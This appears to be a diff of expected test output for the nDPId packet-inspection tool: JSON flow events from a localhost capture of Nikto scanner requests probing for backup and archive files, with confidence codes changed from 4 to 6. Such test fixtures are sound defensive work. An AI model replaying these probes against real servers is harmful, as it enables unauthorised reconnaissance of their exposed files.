+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277266,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277268,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":1,"flow_last_seen":1576420277268,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277268,"pkt":"AAAAAAAAAAAAAAAACABFAADKWilAAEAG4gJ\/AAABfwAAAcR0H5DTe2KDABhOQYAYAED+vgAAAQEICp1m\/TydZv08R0VUIC8xMjdfMF8wXzEudGFyLmx6bWEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277268,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277268,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277269,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":1,"flow_last_seen":1576420277269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277269,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/XglAAEAG3i1\/AAABfwAAAcR2H5D4uGaj1sX5qYAYAED+swAAAQEICp1m\/T2dZv09R0VUIC8xMjcuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277269,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277269,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277270,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":1,"flow_last_seen":1576420277270,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277270,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/A5hAAEAGOJ9\/AAABfwAAAcR4H5CBQjs0aZw5xIAYAED+swAAAQEICp1m\/T6dZv0+R0VUIC8xMjcuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277270,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277270,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277272,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":1,"flow_last_seen":1576420277272,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277272,"pkt":"AAAAAAAAAAAAAAAACABFAADA729AAEAGTMZ\/AAABfwAAAcR6H5Cm4tfMZrHSAYAYAED+tAAAAQEICp1m\/UCdZv1AR0VUIC8xLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277272,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277272,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277274,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":1,"flow_last_seen":1576420277274,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277274,"pkt":"AAAAAAAAAAAAAAAACABFAADAlOZAAEAGp09\/AAABfwAAAcR8H5CKg6xDWKPSxIAYAED+tAAAAQEICp1m\/UKdZv1CR0VUIC8xLnRhci5neiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277274,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277274,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277276,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":1,"flow_last_seen":1576420277276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277276,"pkt":"AAAAAAAAAAAAAAAACABFAAC9in1AAEAGsbt\/AAABfwAAAcR+H5AyA7LdjyrNp4AYAED+sQAAAQEICp1m\/USdZv1DR0VUIC8wLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277276,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277276,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277277,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":1,"flow_last_seen":1576420277277,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277277,"pkt":"AAAAAAAAAAAAAAAACABFAAC906lAAEAGaI9\/AAABfwAAAcSAH5AxZOsBFr\/0GYAYAED+sQAAAQEICp1m\/UWdZv1FR0VUIC8wLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277277,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277277,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277278,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":1,"flow_last_seen":1576420277278,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277278,"pkt":"AAAAAAAAAAAAAAAACABFAADCR05AAEAG9OV\/AAABfwAAAcSCH5Cv93\/sjlpOBIAYAED+tgAAAQEICp1m\/UadZv1GR0VUIC9iYWNrdXAudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 